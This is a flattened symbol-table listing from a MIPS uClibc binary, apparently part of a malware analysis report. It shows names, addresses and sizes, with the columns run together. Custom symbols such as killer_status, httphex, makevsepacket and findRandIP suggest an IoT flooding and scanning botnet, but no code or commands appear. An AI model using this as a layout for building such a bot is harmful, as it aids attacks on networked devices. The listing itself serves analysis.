                __app_fini.symtab0x466e8c4OBJECT<unknown>HIDDEN15
                __atexit_lock.symtab0x46062024OBJECT<unknown>DEFAULT11
                __bss_start.symtab0x460be00NOTYPE<unknown>DEFAULTSHN_ABS
                __check_one_fd.symtab0x413d6c136FUNC<unknown>DEFAULT3
                __close_nameservers.symtab0x41a7a0220FUNC<unknown>HIDDEN3
                __ctype_b.symtab0x4603a44OBJECT<unknown>DEFAULT11
                __ctype_tolower.symtab0x4606744OBJECT<unknown>DEFAULT11
                __ctype_toupper.symtab0x4603b44OBJECT<unknown>DEFAULT11
                __curbrk.symtab0x466eb04OBJECT<unknown>HIDDEN15
                __data_start.symtab0x4602c00OBJECT<unknown>DEFAULT11
                __decode_dotted.symtab0x419490400FUNC<unknown>HIDDEN3
                __decode_header.symtab0x41b0c0228FUNC<unknown>HIDDEN3
                __deregister_frame_info.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                __dns_lookup.symtab0x4196202612FUNC<unknown>HIDDEN3
                __do_global_ctors_aux.symtab0x41b7600FUNC<unknown>DEFAULT3
                __do_global_dtors_aux.symtab0x4001600FUNC<unknown>DEFAULT3
                __dso_handle.symtab0x460bdc0OBJECT<unknown>HIDDEN13
                __encode_dotted.symtab0x41b620316FUNC<unknown>HIDDEN3
                __encode_header.symtab0x41afa0276FUNC<unknown>HIDDEN3
                __encode_question.symtab0x41b1b0172FUNC<unknown>HIDDEN3
                __environ.symtab0x466e844OBJECT<unknown>DEFAULT15
                __errno_location.symtab0x40e3d024FUNC<unknown>DEFAULT3
                __errno_location.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                __exit_cleanup.symtab0x466e704OBJECT<unknown>HIDDEN15
                __fcntl_nocancel.symtab0x40e118136FUNC<unknown>DEFAULT3
                __fgetc_unlocked.symtab0x416ec0388FUNC<unknown>DEFAULT3
                __fini_array_end.symtab0x4602440NOTYPE<unknown>HIDDENSHN_ABS
                __fini_array_start.symtab0x4602440NOTYPE<unknown>HIDDENSHN_ABS
                __get_hosts_byname_r.symtab0x41a880104FUNC<unknown>HIDDEN3
                __getdents64.symtab0x418480460FUNC<unknown>HIDDEN3
                __getpagesize.symtab0x4143b048FUNC<unknown>DEFAULT3
                __glibc_strerror_r.symtab0x41056068FUNC<unknown>DEFAULT3
                __glibc_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                __h_errno_location.symtab0x414c9024FUNC<unknown>DEFAULT3
                __h_errno_location.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                __init_array_end.symtab0x4602440NOTYPE<unknown>HIDDENSHN_ABS
                __init_array_start.symtab0x4602440NOTYPE<unknown>HIDDENSHN_ABS
                __libc_close.symtab0x40e33088FUNC<unknown>DEFAULT3
                __libc_connect.symtab0x410a1092FUNC<unknown>DEFAULT3
                __libc_fcntl.symtab0x40e090136FUNC<unknown>DEFAULT3
                __libc_fork.symtab0x40de0088FUNC<unknown>DEFAULT3
                __libc_lseek64.symtab0x41ae60164FUNC<unknown>DEFAULT3
                __libc_nanosleep.symtab0x4145e092FUNC<unknown>DEFAULT3
                __libc_open.symtab0x40dcd0124FUNC<unknown>DEFAULT3
                __libc_read.symtab0x40df8088FUNC<unknown>DEFAULT3
                __libc_recv.symtab0x410b5092FUNC<unknown>DEFAULT3
                __libc_recvfrom.symtab0x410c3432FUNC<unknown>DEFAULT3
                __libc_select.symtab0x40df5c32FUNC<unknown>DEFAULT3
                __libc_send.symtab0x410c6092FUNC<unknown>DEFAULT3
                __libc_sendto.symtab0x410d4432FUNC<unknown>DEFAULT3
                __libc_sigaction.symtab0x4142d028FUNC<unknown>DEFAULT3
                __libc_stack_end.symtab0x466e804OBJECT<unknown>DEFAULT15
                __libc_waitpid.symtab0x40de6028FUNC<unknown>DEFAULT3
                __libc_write.symtab0x40e1a088FUNC<unknown>DEFAULT3
                __local_nameserver.symtab0x41ff2016OBJECT<unknown>HIDDEN5
                __malloc_consolidate.symtab0x4122f4520FUNC<unknown>HIDDEN3
                __malloc_largebin_index.symtab0x411070140FUNC<unknown>DEFAULT3
                __malloc_lock.symtab0x46052024OBJECT<unknown>DEFAULT11
                __malloc_state.symtab0x467040888OBJECT<unknown>DEFAULT15
                __malloc_trim.symtab0x4121d0292FUNC<unknown>DEFAULT3
                __nameserver.symtab0x460c044OBJECT<unknown>HIDDEN14
                __nameservers.symtab0x460c084OBJECT<unknown>HIDDEN14
                __open_etc_hosts.symtab0x41b26032FUNC<unknown>HIDDEN3
                __open_nameservers.symtab0x41a1301636FUNC<unknown>HIDDEN3
                __pagesize.symtab0x466e884OBJECT<unknown>DEFAULT15
                __preinit_array_end.symtab0x4602440NOTYPE<unknown>HIDDENSHN_ABS
                __preinit_array_start.symtab0x4602440NOTYPE<unknown>HIDDENSHN_ABS
                __progname.symtab0x4606444OBJECT<unknown>DEFAULT11
                __progname_full.symtab0x4606484OBJECT<unknown>DEFAULT11
                __pthread_initialize_minimal.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                __pthread_mutex_init.symtab0x413c688FUNC<unknown>DEFAULT3
                __pthread_mutex_lock.symtab0x413c608FUNC<unknown>DEFAULT3
                __pthread_mutex_trylock.symtab0x413c608FUNC<unknown>DEFAULT3
                __pthread_mutex_unlock.symtab0x413c608FUNC<unknown>DEFAULT3
                __pthread_return_0.symtab0x413c608FUNC<unknown>DEFAULT3
                __read_etc_hosts_r.symtab0x41b280712FUNC<unknown>HIDDEN3
                __register_frame_info.symtab0x00FUNC<unknown>DEFAULTSHN_UNDEF
                __res_sync.symtab0x460bfc4OBJECT<unknown>HIDDEN14
                __resolv_attempts.symtab0x4606611OBJECT<unknown>HIDDEN11
                __resolv_lock.symtab0x466ed024OBJECT<unknown>DEFAULT15
                __resolv_timeout.symtab0x4606601OBJECT<unknown>HIDDEN11
                __rtld_fini.symtab0x466e904OBJECT<unknown>HIDDEN15
                __searchdomain.symtab0x460c004OBJECT<unknown>HIDDEN14
                __searchdomains.symtab0x460c0c4OBJECT<unknown>HIDDEN14
                __sigaddset.symtab0x41100844FUNC<unknown>DEFAULT3
                __sigdelset.symtab0x41103448FUNC<unknown>DEFAULT3
                __sigismember.symtab0x410fe040FUNC<unknown>DEFAULT3
                __start.symtab0x4002b0100FUNC<unknown>DEFAULT3
                __stdin.symtab0x46040c4OBJECT<unknown>DEFAULT11
                __stdio_READ.symtab0x418830144FUNC<unknown>HIDDEN3
                __stdio_WRITE.symtab0x415620296FUNC<unknown>HIDDEN3
                __stdio_adjust_position.symtab0x4188c0292FUNC<unknown>HIDDEN3
                __stdio_fwrite.symtab0x415ae0472FUNC<unknown>HIDDEN3
                __stdio_init_mutex.symtab0x40e66c32FUNC<unknown>HIDDEN3
                __stdio_mutex_initializer.4474.symtab0x41ec8024OBJECT<unknown>DEFAULT5
                __stdio_rfill.symtab0x4189f088FUNC<unknown>HIDDEN3
                __stdio_seek.symtab0x418b40112FUNC<unknown>HIDDEN3
                __stdio_trans2r_o.symtab0x418a50228FUNC<unknown>HIDDEN3
                __stdio_trans2w_o.symtab0x415cc0312FUNC<unknown>HIDDEN3
                __stdio_wcommit.symtab0x40e7c0100FUNC<unknown>HIDDEN3
                __stdout.symtab0x4604104OBJECT<unknown>DEFAULT11
                __sys_recvfrom.symtab0x410bb0132FUNC<unknown>DEFAULT3
                __sys_sendto.symtab0x410cc0132FUNC<unknown>DEFAULT3
                __syscall_error.symtab0x40dbb092FUNC<unknown>DEFAULT3
                __syscall_fcntl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                __syscall_rt_sigaction.symtab0x4146d088FUNC<unknown>DEFAULT3
                __syscall_rt_sigaction.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                __syscall_select.symtab0x40dee0124FUNC<unknown>DEFAULT3
                __uClibc_fini.symtab0x413ca0204FUNC<unknown>DEFAULT3
                __uClibc_init.symtab0x413df4140FUNC<unknown>DEFAULT3
                __uClibc_main.symtab0x413e80948FUNC<unknown>DEFAULT3
                __uClibc_main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                __uclibc_progname.symtab0x4606404OBJECT<unknown>HIDDEN11
                __vfork.symtab0x40dc1076FUNC<unknown>DEFAULT3
                __xpg_strerror_r.symtab0x4105f0388FUNC<unknown>DEFAULT3
                __xpg_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                __xstat32_conv.symtab0x4182c8220FUNC<unknown>HIDDEN3
                __xstat64_conv.symtab0x4181d0248FUNC<unknown>HIDDEN3
                __xstat_conv.symtab0x4183a4220FUNC<unknown>HIDDEN3
                _adjust_pos.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                _bss_custom_printf_spec.symtab0x466c7010OBJECT<unknown>DEFAULT15
                _charpad.symtab0x40e830156FUNC<unknown>DEFAULT3
                _cs_funcs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                _custom_printf_arginfo.symtab0x466fe040OBJECT<unknown>HIDDEN15
                _custom_printf_handler.symtab0x46700840OBJECT<unknown>HIDDEN15
                _custom_printf_spec.symtab0x4605104OBJECT<unknown>HIDDEN11
                _dl_aux_init.symtab0x4180a040FUNC<unknown>DEFAULT3
                _dl_phdr.symtab0x460bf44OBJECT<unknown>DEFAULT14
                _dl_phnum.symtab0x460bf84OBJECT<unknown>DEFAULT14
                _edata.symtab0x460be00NOTYPE<unknown>DEFAULTSHN_ABS
                _end.symtab0x4673b80NOTYPE<unknown>DEFAULTSHN_ABS
                _errno.symtab0x466ea04OBJECT<unknown>DEFAULT15
                _exit.symtab0x40e27092FUNC<unknown>DEFAULT3
                _exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                _fbss.symtab0x460be00NOTYPE<unknown>DEFAULTSHN_ABS
                _fdata.symtab0x4602b00NOTYPE<unknown>DEFAULT11
                _fini.symtab0x41b7d028FUNC<unknown>DEFAULT4
                _fixed_buffers.symtab0x464c688192OBJECT<unknown>DEFAULT15
                _fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                _fp_out_narrow.symtab0x40e8cc232FUNC<unknown>DEFAULT3
                _fpmaxtostr.symtab0x4160302156FUNC<unknown>HIDDEN3
                _fpmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                _ftext.symtab0x4001600NOTYPE<unknown>DEFAULT3
                _fwrite.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                _gp.symtab0x4686700NOTYPE<unknown>DEFAULTSHN_ABS
                _gp_disp.symtab0x00OBJECT<unknown>DEFAULTSHN_UNDEF
                _h_errno.symtab0x466ea44OBJECT<unknown>DEFAULT15
                _init.symtab0x4000cc28FUNC<unknown>DEFAULT2
                _load_inttype.symtab0x415e00132FUNC<unknown>HIDDEN3
                _load_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                _ppfs_init.symtab0x40f280248FUNC<unknown>HIDDEN3
                _ppfs_init.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                _ppfs_parsespec.symtab0x40f68c1684FUNC<unknown>HIDDEN3
                _ppfs_parsespec.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                _ppfs_prepargs.symtab0x40f380100FUNC<unknown>HIDDEN3
                _ppfs_prepargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                _ppfs_setargs.symtab0x40f3f0548FUNC<unknown>HIDDEN3
                _ppfs_setargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                _promoted_size.symtab0x40f620108FUNC<unknown>DEFAULT3
                _pthread_cleanup_pop_restore.symtab0x413c7c36FUNC<unknown>DEFAULT3
                _pthread_cleanup_push_defer.symtab0x413c7012FUNC<unknown>DEFAULT3
                _rfill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                _sigintr.symtab0x46703016OBJECT<unknown>HIDDEN15
                _stdio.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                _stdio_fopen.symtab0x415750908FUNC<unknown>HIDDEN3
                _stdio_init.symtab0x40e5b0188FUNC<unknown>HIDDEN3
                _stdio_openlist.symtab0x4604144OBJECT<unknown>DEFAULT11
                _stdio_openlist_add_lock.symtab0x4603c024OBJECT<unknown>DEFAULT11
                _stdio_openlist_dec_use.symtab0x416a90412FUNC<unknown>HIDDEN3
                _stdio_openlist_del_count.symtab0x464c644OBJECT<unknown>DEFAULT15
                _stdio_openlist_del_lock.symtab0x4603d824OBJECT<unknown>DEFAULT11
                _stdio_openlist_use_count.symtab0x464c604OBJECT<unknown>DEFAULT15
                _stdio_streams.symtab0x460418240OBJECT<unknown>DEFAULT11
                _stdio_term.symtab0x40e68c304FUNC<unknown>HIDDEN3
                _stdio_user_locking.symtab0x4603f04OBJECT<unknown>DEFAULT11
                _stdlib_strto_l.symtab0x4131a0600FUNC<unknown>HIDDEN3
                _stdlib_strto_l.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                _store_inttype.symtab0x415e9068FUNC<unknown>HIDDEN3
                _store_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                _string_syserrmsgs.symtab0x41edf02934OBJECT<unknown>HIDDEN5
                _string_syserrmsgs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                _trans2r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                _trans2w.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                _uintmaxtostr.symtab0x415ee0332FUNC<unknown>HIDDEN3
                _uintmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                _vfprintf_internal.symtab0x40e9b42240FUNC<unknown>HIDDEN3
                _vfprintf_internal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                _wcommit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                abort.symtab0x4127f0408FUNC<unknown>DEFAULT3
                abort.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                access.symtab0x40de8088FUNC<unknown>DEFAULT3
                access.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                acnc.symtab0x40620c372FUNC<unknown>DEFAULT3
                add_entry.symtab0x40c5b0200FUNC<unknown>DEFAULT3
                atoi.symtab0x41316028FUNC<unknown>DEFAULT3
                atol.symtab0x41316028FUNC<unknown>DEFAULT3
                atol.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                bcopy.symtab0x4105b032FUNC<unknown>DEFAULT3
                bcopy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                been_there_done_that.symtab0x466e604OBJECT<unknown>DEFAULT15
                brk.symtab0x4180d0112FUNC<unknown>DEFAULT3
                brk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                bsd_signal.symtab0x410ef0236FUNC<unknown>DEFAULT3
                buf.5324.symtab0x466c90440OBJECT<unknown>DEFAULT15
                bzero.symtab0x41078028FUNC<unknown>DEFAULT3
                bzero.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                c.symtab0x4602ec4OBJECT<unknown>DEFAULT11
                calloc.symtab0x411be0348FUNC<unknown>DEFAULT3
                calloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                checksum.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                checksum_generic.symtab0x400320268FUNC<unknown>DEFAULT3
                checksum_tcp_udp.symtab0x40042c572FUNC<unknown>DEFAULT3
                checksum_tcpudp.symtab0x400668572FUNC<unknown>DEFAULT3
                clock.symtab0x40e3f0108FUNC<unknown>DEFAULT3
                clock.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                clock_getres.symtab0x4143f088FUNC<unknown>DEFAULT3
                clock_getres.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                close.symtab0x40e33088FUNC<unknown>DEFAULT3
                close.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                closedir.symtab0x414730308FUNC<unknown>DEFAULT3
                closedir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                closenameservers.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                completed.4632.symtab0x460c101OBJECT<unknown>DEFAULT15
                connect.symtab0x410a1092FUNC<unknown>DEFAULT3
                connect.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                connectTimeout.symtab0x403038828FUNC<unknown>DEFAULT3
                crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                csum.symtab0x4036b8460FUNC<unknown>DEFAULT3
                data_start.symtab0x4602c00OBJECT<unknown>DEFAULT11
                decoded.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                decodeh.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                dl-support.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                dnslookup.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                dup2.symtab0x40dc6088FUNC<unknown>DEFAULT3
                dup2.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                encoded.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                encodeh.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                encodeq.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                environ.symtab0x466e844OBJECT<unknown>DEFAULT15
                errno.symtab0x466ea04OBJECT<unknown>DEFAULT15
                errno.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                estridx.symtab0x41ed60126OBJECT<unknown>DEFAULT5
                execl.symtab0x413b00196FUNC<unknown>DEFAULT3
                execl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                execve.symtab0x41435088FUNC<unknown>DEFAULT3
                execve.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                exit.symtab0x413400236FUNC<unknown>DEFAULT3
                exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                exp10_table.symtab0x41fe0872OBJECT<unknown>DEFAULT5
                fclose.symtab0x415400512FUNC<unknown>DEFAULT3
                fclose.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                fcntl.symtab0x40e090136FUNC<unknown>DEFAULT3
                fd_to_DIR.symtab0x414870276FUNC<unknown>DEFAULT3
                fdgets.symtab0x402618292FUNC<unknown>DEFAULT3
                fdopen_pids.symtab0x464c4c4OBJECT<unknown>DEFAULT15
                fdopendir.symtab0x414a88248FUNC<unknown>DEFAULT3
                fdpclose.symtab0x40239c636FUNC<unknown>DEFAULT3
                fdpopen.symtab0x401f301132FUNC<unknown>DEFAULT3
                fflush_unlocked.symtab0x416c2c648FUNC<unknown>DEFAULT3
                fflush_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                fgetc.symtab0x4168a0264FUNC<unknown>DEFAULT3
                fgetc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                fgetc_unlocked.symtab0x416ec0388FUNC<unknown>DEFAULT3
                fgetc_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                fgets.symtab0x4169b0212FUNC<unknown>DEFAULT3
                fgets.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                fgets_unlocked.symtab0x417050276FUNC<unknown>DEFAULT3
                fgets_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                findRandIP.symtab0x40360c172FUNC<unknown>DEFAULT3
                fmt.symtab0x41fdf020OBJECT<unknown>DEFAULT5
                fopen.symtab0x41560028FUNC<unknown>DEFAULT3
                fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                fork.symtab0x40de0088FUNC<unknown>DEFAULT3
                fork.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                fputs_unlocked.symtab0x40fd20124FUNC<unknown>DEFAULT3
                fputs_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                frame_dummy.symtab0x40021c0FUNC<unknown>DEFAULT3
                free.symtab0x4124fc660FUNC<unknown>DEFAULT3
                free.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                fseek.symtab0x41865068FUNC<unknown>DEFAULT3
                fseeko.symtab0x41865068FUNC<unknown>DEFAULT3
                fseeko.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                fseeko64.symtab0x4186a0392FUNC<unknown>DEFAULT3
                fseeko64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                fstat.symtab0x418140144FUNC<unknown>DEFAULT3
                fstat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                fwrite_unlocked.symtab0x40fda0268FUNC<unknown>DEFAULT3
                fwrite_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                getBuild.symtab0x409f4c32FUNC<unknown>DEFAULT3
                getHost.symtab0x402a7c160FUNC<unknown>DEFAULT3
                getOurIP.symtab0x409bcc896FUNC<unknown>DEFAULT3
                get_hosts_byname_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                getc.symtab0x4168a0264FUNC<unknown>DEFAULT3
                getc_unlocked.symtab0x416ec0388FUNC<unknown>DEFAULT3
                getdents64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                getdtablesize.symtab0x40dfe072FUNC<unknown>DEFAULT3
                getdtablesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                getegid.symtab0x4144b016FUNC<unknown>DEFAULT3
                getegid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                geteuid.symtab0x40ddf016FUNC<unknown>DEFAULT3
                geteuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                getgid.symtab0x41457016FUNC<unknown>DEFAULT3
                getgid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                gethostbyname.symtab0x41096028FUNC<unknown>DEFAULT3
                gethostbyname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                gethostbyname2.symtab0x410980132FUNC<unknown>DEFAULT3
                gethostbyname2.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                gethostbyname2_r.symtab0x417c90948FUNC<unknown>DEFAULT3
                gethostbyname2_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                gethostbyname_r.symtab0x41a8f0940FUNC<unknown>DEFAULT3
                gethostbyname_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                gethostname.symtab0x41ad00204FUNC<unknown>DEFAULT3
                gethostname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                getpagesize.symtab0x4143b048FUNC<unknown>DEFAULT3
                getpagesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                getpid.symtab0x40dd5016FUNC<unknown>DEFAULT3
                getpid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                getppid.symtab0x40dcc016FUNC<unknown>DEFAULT3
                getppid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                getrlimit.symtab0x41445088FUNC<unknown>DEFAULT3
                getrlimit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                getsockname.symtab0x410a7088FUNC<unknown>DEFAULT3
                getsockname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                getsockopt.symtab0x410ad0124FUNC<unknown>DEFAULT3
                getsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                getuid.symtab0x4143e016FUNC<unknown>DEFAULT3
                getuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                h_errno.symtab0x466ea44OBJECT<unknown>DEFAULT15
                hacks.symtab0x4602d04OBJECT<unknown>DEFAULT11
                hacks2.symtab0x4602d44OBJECT<unknown>DEFAULT11
                hacks3.symtab0x4602d84OBJECT<unknown>DEFAULT11
                hacks4.symtab0x4602dc4OBJECT<unknown>DEFAULT11
                hextable.symtab0x41c5241024OBJECT<unknown>DEFAULT5
                hlt.symtab0x40030c0NOTYPE<unknown>DEFAULT3
                hoste.5323.symtab0x466e4820OBJECT<unknown>DEFAULT15
                htonl.symtab0x4108a840FUNC<unknown>DEFAULT3
                htons.symtab0x41089024FUNC<unknown>DEFAULT3
                httphex.symtab0x40653c1664FUNC<unknown>DEFAULT3
                i.4849.symtab0x4602f04OBJECT<unknown>DEFAULT11
                index.symtab0x410460248FUNC<unknown>DEFAULT3
                inet_addr.symtab0x41091072FUNC<unknown>DEFAULT3
                inet_aton.symtab0x417b70284FUNC<unknown>DEFAULT3
                inet_aton.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                inet_makeaddr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                inet_ntop.symtab0x419120868FUNC<unknown>DEFAULT3
                inet_ntop4.symtab0x418f58456FUNC<unknown>DEFAULT3
                inet_pton.symtab0x418c98704FUNC<unknown>DEFAULT3
                inet_pton4.symtab0x418bb0232FUNC<unknown>DEFAULT3
                initConnection.symtab0x409908708FUNC<unknown>DEFAULT3
                init_rand.symtab0x400ae4300FUNC<unknown>DEFAULT3
                initfini.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                initfini.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                initstate.symtab0x412b0c208FUNC<unknown>DEFAULT3
                initstate_r.symtab0x413010328FUNC<unknown>DEFAULT3
                ioctl.symtab0x40e200108FUNC<unknown>DEFAULT3
                ioctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                isatty.symtab0x4107a060FUNC<unknown>DEFAULT3
                isatty.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                kill.symtab0x40e03092FUNC<unknown>DEFAULT3
                kill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                killer_status.symtab0x460c404OBJECT<unknown>DEFAULT15
                last_id.5381.symtab0x4606502OBJECT<unknown>DEFAULT11
                last_ns_num.5380.symtab0x466ec04OBJECT<unknown>DEFAULT15
                libc/string/mips/memcpy.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                libc/string/mips/memset.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                libc/sysdeps/linux/mips/crt1.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                libc/sysdeps/linux/mips/crti.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                libc/sysdeps/linux/mips/crtn.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                libc/sysdeps/linux/mips/pipe.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                libc/sysdeps/linux/mips/syscall_error.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                libc/sysdeps/linux/mips/vfork.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                listFork.symtab0x403374664FUNC<unknown>DEFAULT3
                llseek.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                lseek64.symtab0x41ae60164FUNC<unknown>DEFAULT3
                macAddress.symtab0x460c446OBJECT<unknown>DEFAULT15
                main.symtab0x409f6c3700FUNC<unknown>DEFAULT3
                main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                makeIPPacket.symtab0x4039e0296FUNC<unknown>DEFAULT3
                makeRandomStr.symtab0x402bc0268FUNC<unknown>DEFAULT3
                makevsepacket.symtab0x405704332FUNC<unknown>DEFAULT3
                malloc.symtab0x4110fc2776FUNC<unknown>DEFAULT3
                malloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                malloc_trim.symtab0x41279084FUNC<unknown>DEFAULT3
                memchr.symtab0x417170260FUNC<unknown>DEFAULT3
                memchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                memcpy.symtab0x40ff40308FUNC<unknown>DEFAULT3
                memmove.symtab0x417280824FUNC<unknown>DEFAULT3
                memmove.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                mempcpy.symtab0x4179e076FUNC<unknown>DEFAULT3
                mempcpy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                memrchr.symtab0x4177e0260FUNC<unknown>DEFAULT3
                memrchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                memset.symtab0x40feb0144FUNC<unknown>DEFAULT3
                mmap.symtab0x414240132FUNC<unknown>DEFAULT3
                mmap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                mremap.symtab0x414640124FUNC<unknown>DEFAULT3
                mremap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                munmap.symtab0x41458088FUNC<unknown>DEFAULT3
                munmap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                mylock.symtab0x46054024OBJECT<unknown>DEFAULT11
                mylock.symtab0x46056024OBJECT<unknown>DEFAULT11
                nanosleep.symtab0x4145e092FUNC<unknown>DEFAULT3
                nanosleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                next_start.1303.symtab0x466c804OBJECT<unknown>DEFAULT15
                ngPid.symtab0x460be84OBJECT<unknown>DEFAULT14
                nprocessors_onln.symtab0x413610508FUNC<unknown>DEFAULT3
                ntohl.symtab0x4108e840FUNC<unknown>DEFAULT3
                ntohl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                ntohs.symtab0x4108d024FUNC<unknown>DEFAULT3
                ntop.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                numpids.symtab0x460c388OBJECT<unknown>DEFAULT15
                object.4644.symtab0x460c1424OBJECT<unknown>DEFAULT15
                open.symtab0x40dcd0124FUNC<unknown>DEFAULT3
                open.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                opendir.symtab0x414984260FUNC<unknown>DEFAULT3
                opendir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                opennameservers.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                ourIP.symtab0x460be44OBJECT<unknown>DEFAULT14
                p.4630.symtab0x4602b00OBJECT<unknown>DEFAULT11
                parseHex.symtab0x40273c176FUNC<unknown>DEFAULT3
                parse_config.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                pids.symtab0x460bf04OBJECT<unknown>DEFAULT14
